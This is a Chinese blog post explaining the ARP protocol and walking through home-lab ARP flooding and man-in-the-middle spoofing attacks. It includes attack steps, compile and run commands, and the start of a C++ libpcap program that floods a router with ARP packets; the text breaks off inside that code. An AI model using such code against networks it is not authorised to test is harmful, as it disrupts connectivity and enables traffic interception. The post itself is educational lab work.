<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="​	ARP（Address Resolution Protocol，地址解析协议），是一种将IP地址和以太网MAC地址（物理地址）连接起来的协议。在局域网中，当主机或其他网络设备有数据要发送给另一个主机或设备时，仅仅知道对方的IP地址是不够的，因为IP数据报文必须封装成帧才能通过物理链路发送。因此发送方还需要有下一跳的物理MAC地址，也就需要一个从IP地址到物理地址的映射。  ARP报文格式​">
<meta property="og:type" content="article">
<meta property="og:title" content="ARP协议及内网攻击实践">
<meta property="og:url" content="https://www.chaceq.love/2023/08/21/N01_arp/index.html">
<meta property="og:site_name" content="chaceq.love">
<meta property="og:description" content="​	ARP（Address Resolution Protocol，地址解析协议），是一种将IP地址和以太网MAC地址（物理地址）连接起来的协议。在局域网中，当主机或其他网络设备有数据要发送给另一个主机或设备时，仅仅知道对方的IP地址是不够的，因为IP数据报文必须封装成帧才能通过物理链路发送。因此发送方还需要有下一跳的物理MAC地址，也就需要一个从IP地址到物理地址的映射。  ARP报文格式​">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s2.loli.net/2023/08/20/DbF1nzhfpC3H4eB.jpg">
<meta property="og:image" content="https://s2.loli.net/2023/08/20/buwDEK6eIMGR9lU.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/20/hziDHbg1VdJOpSv.jpg">
<meta property="og:image" content="https://s2.loli.net/2023/08/20/Yj6ndSoOKpPcxJF.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/20/gDHSh2Aclkfu3Vt.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/20/8qwXEFLUKypngS7.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/20/4UrgdEsVyIntBzc.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/22/ZSxzP2vkYdcJ34y.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/22/VdTrXESG5iKJqkZ.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/22/tErosQqWnAbI1YZ.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/22/FQ9uCrmhBpSa3vK.jpg">
<meta property="og:image" content="https://s2.loli.net/2023/08/22/eiY6BXj1WQ8fc9b.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/20/bV1ETDA7zn2P9mr.png">
<meta property="article:published_time" content="2023-08-21T13:54:54.221Z">
<meta property="article:modified_time" content="2023-08-28T14:26:37.527Z">
<meta property="article:author" content="sqq">
<meta property="article:tag" content="Computer Networks">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2023/08/20/DbF1nzhfpC3H4eB.jpg">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>ARP协议及内网攻击实践</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/Operating-System/">Operating System</a></li><!--
     --><!--
       --><li><a href="/tags/Computer-Networks/">Computer Networks</a></li><!--
     --><!--
       --><li><a href="/tags/General-Records/">General Records</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2023/08/31/N02_dhcp/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2023/07/05/O04_task_struct/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.chaceq.love/2023/08/21/N01_arp/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.chaceq.love/2023/08/21/N01_arp/&text=ARP协议及内网攻击实践"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.chaceq.love/2023/08/21/N01_arp/&title=ARP协议及内网攻击实践"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ARP协议及内网攻击实践&body=Check out this article: https://www.chaceq.love/2023/08/21/N01_arp/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ARP%E6%8A%A5%E6%96%87%E6%A0%BC%E5%BC%8F"><span class="toc-number">1.</span> <span class="toc-text">ARP报文格式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ARP%E5%86%85%E7%BD%91%E6%94%BB%E5%87%BB%E5%AE%9E%E8%B7%B5"><span class="toc-number">2.</span> <span class="toc-text">ARP内网攻击实践</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%88%E4%B8%80%EF%BC%89%E5%87%86%E5%A4%87%E8%AE%BE%E5%A4%87"><span class="toc-number">2.1.</span> <span class="toc-text">（一）准备设备</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ARP%E6%B3%9B%E6%B4%AA%E6%94%BB%E5%87%BB"><span class="toc-number">2.2.</span> <span class="toc-text">ARP泛洪攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ARP%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB"><span class="toc-number">2.3.</span> <span class="toc-text">ARP中间人攻击</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B8%A9%E5%9D%91%E8%A1%A5%E5%85%85"><span class="toc-number">3.</span> <span class="toc-text">踩坑补充</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        ARP协议及内网攻击实践
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">sqq</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-08-21T13:54:54.221Z" class="dt-published" itemprop="datePublished">2023-08-21</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Computer-Networks/" rel="tag">Computer Networks</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <blockquote>
<p>​	ARP（Address Resolution Protocol，地址解析协议），是一种将IP地址和以太网MAC地址（物理地址）连接起来的协议。在<strong>局域网</strong>中，当主机或其他网络设备有数据要发送给另一个主机或设备时，仅仅知道对方的IP地址是不够的，因为IP数据报文必须封装成帧才能通过物理链路发送。因此发送方还需要有下一跳的物理MAC地址，也就需要一个从IP地址到物理地址的映射。</p>
</blockquote>
<h2 id="ARP报文格式"><a href="#ARP报文格式" class="headerlink" title="ARP报文格式"></a>ARP报文格式</h2><p>​	在TCP&#x2F;IP模型中，ARP协议属于网络层，在OSI模型中ARP协议属于链路层，从功能来看，它则是连接IP地址和MAC地址的桥梁，并在局域网的路由过程中起到了至关重要的作用。无论是主机或是交换机内部都有一张ARP缓存表，记录着邻居主机或网关的IP地址及MAC地址的映射，ARP表分为动态ARP表项和静态ARP表项，静态表项通过手动配置更新，而动态表项通过自学习更新，并设有老化时间（RFC1122中规定一般20分钟）。以下是动态ARP自学习的大致流程：</p>
<ol>
<li>若主机A想向主机B发送数据包Package，A首先会查看自己的ARP缓存表，确定是否包含有主机B的IP地址及对应的MAC地址表项。</li>
<li>若有，则主机A直接利用ARP表中的MAC地址对IP数据报进行帧封装，并将数据报发送给主机B；若没有，则A会以广播方式发送一个ARP请求报文，该报文会被局域网内所有主机收到。若某主机发现该ARP请求报文是查询自己的MAC地址，则会以单播方式向主机A回应一个ARP响应报文，应答报文中就包含了自己的MAC地址。如果发现不是自己的，就忽略并丢弃该报文。</li>
<li>而主机A在收到来自目标主机B的ARP响应报文后，会将B的MAC地址加入到自己的ARP缓存表中方便下次直接使用，然后填充数据包Package并发送出去。</li>
</ol>
<blockquote>
<p>值得注意的是，若主机B位于局域网内，则主机A会按上述流程广播请求B的MAC地址；但假若主机B位于该局域网外，则A需要查询的则是网关的MAC地址而不是B的MAC地址，因为Package的下一跳是网关。</p>
</blockquote>
<p><img src="https://s2.loli.net/2023/08/20/DbF1nzhfpC3H4eB.jpg" alt="networks.jpg"></p>
<p>​	ARP的报文长度28个字节，包含8个字节的报头以及20个字节的地址四元组。如下图所示：</p>
<p><img src="https://s2.loli.net/2023/08/20/buwDEK6eIMGR9lU.png" alt="image.png"></p>
<ul>
<li>硬件类型：通常取1，表示以太网络。（也有其他的例如IEEE 802网络：6，ATM网络：37，等）</li>
<li>上层协议类型：通常是IPv4，值为0x0800</li>
<li>硬件地址长度：以太网中为6（字节）</li>
<li>协议长度：IPv4长度为4（字节）</li>
<li>操作码（Opcode）类型：ARP 请求为 1，ARP 响应为 2，RARP 请求为 3，RARP 响应为 4（RARP：反向地址转换协议，允许局域网的物理机器从网关服务器的 ARP 表或者缓存上请求其 IP 地址）。</li>
</ul>
<p>​	ARP是个独立的三层协议，不需要IP协议封装。在第二层数据链路层封装的过程中，会在ARP报文的前面加上14字节的以太网帧头，以及若干字节的PAD填充和4字节的冗余校验码（FCS）结尾。以太网中最小帧长度为64字节，若不足64字节则PAD字段会以0填充，而校验码则用于检验数据传输是否出现损坏。</p>
<p><img src="https://s2.loli.net/2023/08/20/hziDHbg1VdJOpSv.jpg" alt="arp帧.jpg"></p>
<p>​	我们通过wireshark抓包也可以很清晰地看到整个ARP报文的格式：（省略了帧尾的PAD和FCS字段）<img src="https://s2.loli.net/2023/08/20/Yj6ndSoOKpPcxJF.png" alt="image.png"></p>
<p>​	我们前面提到，ARP操作码里，1表示请求报文，2表示响应报文。通常ARP的请求报文是广播请求（因为不知道该IP对应哪台设备，因此需要在局域网内广播），而响应是单播响应。广播请求的ARP帧目的地址会被填充成<strong>FF-FF-FF-FF-FF-FF</strong>，并且在ARP报文里的Target MAC address会置为0，如下图一所示。而响应报文里的Sender MAC address则说明了被查询主机的MAC地址，如图二所示。<img src="https://s2.loli.net/2023/08/20/gDHSh2Aclkfu3Vt.png" alt="image.png"><img src="https://s2.loli.net/2023/08/20/8qwXEFLUKypngS7.png" alt="image.png"></p>
<p>​	除此之外，还有一种比较特殊的报文：Gratuitous ARP，它属于广播请求报文的范畴，而特殊性在于它的Sender MAC address等于Target MAC address，如下图所示，它可能有以下一些作用：</p>
<ul>
<li>该类型报文起到一个宣告作用。它以广播的形式将该数据包昭告大家，不需要得到回应，只为了告诉局域网内其他计算机自己的 IP 地址和 MAC 地址。</li>
<li>可用于检测 IP 地址冲突。当一台主机发送了Gratuitous ARP 请求报文后，如果收到了 ARP 响应报文，则说明网络内已经存在使用该 IP 地址的主机。</li>
<li>可用于更新其他主机的 ARP 缓存表。如果该主机更换了网卡，而其他主机的 ARP 缓存表仍然保留着原来的 MAC 地址。这时，可以发送Gratuitous ARP 数据包。其他主机收到该数据包后，将更新 ARP 缓存表，将原来的 MAC 地址替换为新的 MAC 地址。</li>
</ul>
<p><img src="https://s2.loli.net/2023/08/20/4UrgdEsVyIntBzc.png" alt="Gratuitous ARP.png"></p>
<p>​	尽管Gratuitous ARP可用于检测地址冲突，但规范并没有给出相应手段去解决冲突，为此，2008年发行的RFC5227提出了一个机制：ACD（Address Conflict Detection，地址冲突检测）。这里提出两种比较特殊的ARP请求报文：ARP probe以及ARP announcement，同样的，它们都属于广播请求报文，即Opcode均为1。</p>
<p>​	ARP probe 主要用于网卡刚上线时检测某个IP地址是否有设备占用。它有一个自己想要占用的候选IP地址，并放在ARP包的Target IP address里，而 Sender IP address会填充为0，这是是为了避免对其他主机的ARP cache造成污染（因为可能已经有主机正在使用该候选IP地址了；</p>
<p>​	而 ARP announcement 则用于在选定某个IP地址后，昭示整个局域网（LAN）：本机要使用该IP地址了。它的Sender IP address 等于Target IP address（也就是说结构和Gratuitous ARP一样）。</p>
<p>​	ACD（Address Conflict Detection，地址冲突检测）的具体流程如下。</p>
<ol>
<li>当网卡启动时（或者从睡眠状态恢复，或者链接建立时）会发送一个ARP probe。（为了避免多个网卡同时启动同时发ARP probe造成拥塞，有一个拥塞避免策略，不会立刻发送ARP probe，单个网卡的多个probe也不会连续发送，会有间隔时间）。</li>
<li>发送主机可能收到ARP reply或者ARP probe，如果收到了ARP reply，说明该候选IP地址已经有主机在用了。如果收到了一个Target IP地址为候选IP的 ARP probe，说明另外一个主机也同时想要使用该候选IP地址。这种情况下，两个主机都会提醒用户出现了IP地址冲突。然后进行地址冲突处理。</li>
<li>如果上述两种ARP包都没有收到，说明候选IP地址可用。主机发送一个ARP announcement，告诉其他主机该候选IP本人占用，而这个ARP request会让LAN中其他主机更新自身的ARP cache。</li>
</ol>
<p>​	地址冲突处理：《RFC5227》提供了三种可选的解决机制：1）放弃使用该IP地址。2）发送一个ARP announcement来进行IP地址“守卫”，如果冲突仍然继续存在，放弃使用这个IP。3）无视冲突，继续使用这个IP。</p>
<p>​	当然，对于目前常见的通过DHCP动态获得IP地址的主机来说，通常并不需要在网卡启动时执行ACD过程。在某些手动静态配置IP或特殊网络配置中设备才有可能会使用ACD机制来避免相关冲突。以下是摘自RFC5227对于ACD提出背景的段落，感兴趣的同学可以点击原文了解 -&gt; <a target="_blank" rel="noopener" href="https://www.rfc-editor.org/rfc/rfc5227">RFC 5227: IPv4 Address Conflict Detection (rfc-editor.org)</a> 或 <a target="_blank" rel="noopener" href="https://rfc2cn.com/rfc5227.html">RFC5227: IPv4地址冲突检测 中文版</a>。</p>
<p>​	Historically, accidentally configuring two Internet hosts with the same IP address has often been an annoying and hard-to-diagnose problem.</p>
<p>​	This is unfortunate, because the existing Address Resolution Protocol (ARP) provides an easy way for a host to detect this kind of misconfiguration and report it to the user.  The DHCP specification [RFC2131] briefly mentions the role of ARP in detecting misconfiguration, as illustrated in the following three excerpts from RFC 2131:</p>
<ul>
<li>the client SHOULD probe the newly received address, e.g., with ARP</li>
<li>The client SHOULD perform a final check on the parameters (e.g., ARP for allocated network address)</li>
<li>If the client detects that the address is already in use (e.g., through the use of ARP), the client MUST send a DHCPDECLINE message to the server</li>
</ul>
<p>​	Unfortunately, the DHCP specification does not give any guidance to implementers concerning the number of ARP packets to send, the interval between packets, the total time to wait before concluding that an address may safely be used, or indeed even which kinds of packets a host should be listening for, in order to make this determination. It leaves unspecified the action a host should take if, after concluding that an address may safely be used, it subsequently discovers that it was wrong. It also fails to specify what precautions a DHCP client should take to guard against pathological failure cases, such as a DHCP server that repeatedly OFFERs the same address, even though it has been DECLINEd multiple times.</p>
<p>​	The authors of the DHCP specification may have been justified in thinking at the time that the answers to these questions seemed too simple, obvious, and straightforward to be worth mentioning, but unfortunately this left some of the burden of protocol design to each individual implementer. This document seeks to remedy this omission by clearly specifying the required actions.</p>
<h2 id="ARP内网攻击实践"><a href="#ARP内网攻击实践" class="headerlink" title="ARP内网攻击实践"></a>ARP内网攻击实践</h2><p>​	ARP是建立在网络中各个主机互相信任的基础上的，它的诞生使得网络能够更加高效的运行，但也正因此所以存在安全缺陷。ARP协议无状态，只要某主机收到ARP响应包则会更新自己的ARP缓存表，而非只在自己发送过ARP请求才接收ARP应答。因此，攻击源可以主动伪造ARP响应包，并向局域网中其他设备或网关发送虚假的ARP信息，达到攻击的目的。</p>
<p><strong>「ARP攻击类型」</strong></p>
<ul>
<li><strong>ARP泛洪</strong>：攻击者向网关发送大量ARP包时造成网关cpu，内存压力增大，难以处理正常请求而导致整个网络拥塞甚至瘫痪。</li>
<li><strong>中间人攻击</strong>：当攻击者伪造一个这样的ARP响应包：记录着真实网关IP和虚假的MAC地址，并向局域网内目标设备不断发送，这会造成该设备内ARP缓存的网关MAC地址被篡改，从而使得其发出的数据包被重定向到虚假MAC地址上。如果该MAC是不存在的地址，会造成目标设备断网；而如果该MAC是攻击者的MAC地址，那么目标设备会将本来发送给网关的数据包发送给攻击者，这样则会造成数据被攻击者监听。</li>
</ul>
<p>​	接下来我们实践模拟一下ARP泛洪以及断网攻击。如果有安装Linux Kali发行版，可以利用其内置的 nmap、arpspoo 等渗透测试工具实现。当然也可以选择自己写ARP包进行攻击，我在这里就直接用C++写了，攻击目标是我自家的路由器和几台连接的手机平板设备。准备工具：Linux虚拟机，wireshark用于抓包分析。以下是整个流程的基本思路：</p>
<blockquote>
<p>注意：请勿将网络攻击非法用于公共网络等设施。</p>
</blockquote>
<ol>
<li>首先需要查明自身设备的以及网关的IP和MAC地址等基本信息。</li>
<li>直接向网关发送大量ARP request包造成网络拥塞（ARP泛洪）。</li>
<li>构造ARP request包扫描整个网络连接的设备，通过wireshark查看reply并记录下它们的IP及MAC地址。</li>
<li>构造伪造的ARP reply包向网络中存在的设备发起攻击（中间人攻击）。</li>
</ol>
<h3 id="（一）准备设备"><a href="#（一）准备设备" class="headerlink" title="（一）准备设备"></a>（一）准备设备</h3><p>​	自己在vmware安装的Linux虚拟机网络连接默认应该是NAT模式，通过IP地址和抓包也可以很容易分析出来。我家路由器网关IP为192.168.31.1，物理机为192.168.31.47，而虚拟机Linux却是192.168.80.30，虚拟机向网关的数据包会经过物理机一层转换，因此我们需要首先把虚拟机的网络连接调整为桥接模式。虚拟机有以下三种网络模式：</p>
<p><strong>「虚拟机三种网络模式区别」</strong></p>
<ul>
<li><strong>NAT模式</strong>：宿主机通过NAT建立一层子网，宿主机则是该子网的网关，而<strong>虚拟机需访问互联网则要通过宿主机这个网关转发出去</strong>，从网络拓扑结构来看虚拟机网卡和宿主机网卡不在同一层次网络中。</li>
<li><strong>桥接模式</strong>：指宿主机物理网卡和虚拟网卡通过vmnet虚换交换机进行桥接，<strong>虚权网卡和物理网卡在网络拓扑图上处于同一网络，具有同等地位</strong>，因此虚拟机直接与路由器网关通信。由于我们需要攻击路由器网关以及网络内的其他设备，因此需要让虚拟机与其位于同一网络中，故选用桥接模式。</li>
<li><strong>Host-only模式</strong>：该模式下虚拟网络是一个全封闭的网络，它唯一能够访问的就是宿主机。Host-Only网络和NAT网络比较相似，不同的地方在于<strong>Host-Only网络没有NAT服务，所以虚拟网络不能连接到Internet</strong>。它的宗旨就是建立一个与外界隔绝的内部网络，来提高内网的安全性。</li>
</ul>
<p>​	NAT改桥接模式的细节这里就不过多介绍了，网络上有很多相关的文章。注意，IP地址需要手动设置，但不要和该网络内已被占用的IP冲突了，DNS不设置也没问题，我们实验不需要用到域名解析，当然如果你想让你的虚拟机能通过域名上网还是可以设置一下（可以设置成与物理机相同的DNS域名服务器）。修改完毕后这几个页面大概长这样：<img src="https://s2.loli.net/2023/08/22/ZSxzP2vkYdcJ34y.png" alt="image.png"></p>
<h3 id="ARP泛洪攻击"><a href="#ARP泛洪攻击" class="headerlink" title="ARP泛洪攻击"></a>ARP泛洪攻击</h3><p>​	攻击代码使用C++完成，代码本身比较简单，只需要先定义好ARP结构体，然后根据ARP报文格式进行依次填充即可，最后再利用相关网络包发送的 pcap API 即可实现流程。对比前文提到的ARP帧格式，结构体如下，包含以太网帧头和ARP报文（不包含帧尾PAD和FCS）：<img src="https://s2.loli.net/2023/08/22/VdTrXESG5iKJqkZ.png" alt="image.png"></p>
<p>​	总体代码如下所示，编译命令记得加 pacp 的动态链接：<code> g++ arp_req.cpp -lpcap</code>，运行命令需要管理员权限 <code> sudo ./a.out</code>，运行时需要选择虚拟机网卡，我这里是 ens33，可以通过 <code>ifconfig</code> 命令查看。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;cstring&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;pcap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> pack(push) <span class="comment">// 保持对齐方式</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> pack(1)    <span class="comment">// 设定1位对齐</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> comment(lib, <span class="string">&quot;ws2_32.lib&quot;</span>)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 攻击者ip及mac地址</span></span><br><span class="line"><span class="type">const</span> <span class="type">char</span> *srcip = <span class="string">&quot;192.168.31.51&quot;</span>;</span><br><span class="line">u_char SRC_MAC[<span class="number">6</span>] = &#123;<span class="number">0x00</span>, <span class="number">0x0C</span>, <span class="number">0x29</span>, <span class="number">0x3B</span>, <span class="number">0xBB</span>, <span class="number">0x33</span>&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 广播mac填充地址</span></span><br><span class="line">u_char BROADCAST_MAC[<span class="number">6</span>] = &#123;<span class="number">0xFF</span>, <span class="number">0xFF</span>, <span class="number">0xFF</span>, <span class="number">0xFF</span>, <span class="number">0xFF</span>, <span class="number">0xFF</span>&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 目标设备ip及缺省mac地址</span></span><br><span class="line"><span class="type">const</span> <span class="type">char</span> *victim_ip = <span class="string">&quot;192.168.31.1&quot;</span>;</span><br><span class="line">u_char VICTIM_MAC[<span class="number">6</span>] = &#123;<span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">_eth_header</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> dst_mac[<span class="number">6</span>];</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> src_mac[<span class="number">6</span>];</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">short</span> type;</span><br><span class="line">&#125; ETH_HEADER;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">_arp_header</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">short</span> hardware_type;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">short</span> protocol_type;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> hardware_len;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> protocol_len;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">short</span> option;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> src_mac[<span class="number">6</span>];</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span> src_ip;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> dst_mac[<span class="number">6</span>];</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span> dst_ip;</span><br><span class="line">&#125; ARP_HEADER;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">_arp_packet</span></span><br><span class="line">&#123;</span><br><span class="line">    ETH_HEADER eth_header;</span><br><span class="line">    ARP_HEADER arp_header;</span><br><span class="line">&#125; ARP_PACKET;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">InitARPHeader</span><span class="params">(u_char *tmpBuf)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ARP_HEADER arp_header;</span><br><span class="line">    <span class="type">int</span> arpsize = <span class="built_in">sizeof</span>(ARP_HEADER);</span><br><span class="line"></span><br><span class="line">    arp_header.hardware_type = <span 